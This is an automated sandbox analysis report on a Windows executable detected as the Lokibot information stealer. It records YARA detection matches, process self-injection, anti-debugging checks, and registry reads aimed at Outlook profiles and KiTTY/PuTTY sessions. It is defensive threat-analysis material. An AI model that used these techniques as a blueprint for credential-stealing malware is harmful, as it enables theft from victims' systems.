Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_004047D3
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_004061D4
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_10008836
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_10003D10
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_100110E1
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_1000F902
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_100119AC
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_100059B1
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_1001A9FA
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_1001AA09
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_1000B23E
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_1000FE74
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_10005EA5
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_100062BD
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_100066F2
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_10006B27
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_1000F390
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 1_2_0040549C
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 1_2_004029D4

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: String function: 00405B6F appears 42 times

Source: aZOmps0Ug8.exe, 00000000.00000003.348584665.000000000F186000.00000004.00000001.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs aZOmps0Ug8.exe

Source: aZOmps0Ug8.exe

Virustotal: Detection: 43%

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

File read: C:\Users\user\Desktop\aZOmps0Ug8.exe

Jump to behavior

Source: aZOmps0Ug8.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\aZOmps0Ug8.exe 'C:\Users\user\Desktop\aZOmps0Ug8.exe'
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process created: C:\Users\user\Desktop\aZOmps0Ug8.exe 'C:\Users\user\Desktop\aZOmps0Ug8.exe'
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process created: C:\Users\user\Desktop\aZOmps0Ug8.exe 'C:\Users\user\Desktop\aZOmps0Ug8.exe'

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

File created: C:\Users\user\AppData\Local\Temp\nsj153F.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@81/3

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Source:	Binary string: wntdll.pdbUGP source: aZOmps0Ug8.exe, 00000000.00000003.347212605.000000000F200000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: aZOmps0Ug8.exe, 00000000.00000003.347212605.000000000F200000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Unpacked PE file: 1.2.aZOmps0Ug8.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Unpacked PE file: 1.2.aZOmps0Ug8.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;

Yara detected aPLib compressed binary

Show sources

Source: Yara match	File source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aZOmps0Ug8.exe PID: 6780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aZOmps0Ug8.exe PID: 3980, type: MEMORYSTR

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_1000A505 push ecx; ret
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 1_2_00402AC0 push eax; ret
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 1_2_00402AC0 push eax; ret

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

File created: C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dll

Jump to dropped file

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 0_2_10008836 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Process information set: NOGPFAULTERRORBOX

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe TID: 776

Thread sleep time: -540000s >= -30000s

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_00402671 FindFirstFileA,
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Thread delayed: delay time: 60000

Source: aZOmps0Ug8.exe, 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 0_2_1000CDB2 IsDebuggerPresent,

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 0_2_100093F8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 0_2_100098C2 GetProcessHeap,

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_1001A402 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_1001A616 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_1001A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_1001A706 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 0_2_1001A744 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 0_2_10009B60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Memory written: C:\Users\user\Desktop\aZOmps0Ug8.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Process created: C:\Users\user\Desktop\aZOmps0Ug8.exe 'C:\Users\user\Desktop\aZOmps0Ug8.exe'

Source: aZOmps0Ug8.exe, 00000001.00000002.612184165.0000000000CE0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: aZOmps0Ug8.exe, 00000001.00000002.612184165.0000000000CE0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: aZOmps0Ug8.exe, 00000001.00000002.612184165.0000000000CE0000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: aZOmps0Ug8.exe, 00000001.00000002.612184165.0000000000CE0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 0_2_100098DF cpuid

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 0_2_10012E10 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 1_2_00406069 GetUserNameW,

Stealing of Sensitive Information:

Yara detected Lokibot

Show sources

Source: Yara match	File source: 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aZOmps0Ug8.exe PID: 3980, type: MEMORYSTR
Source: Yara match	File source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aZOmps0Ug8.exe PID: 6780, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
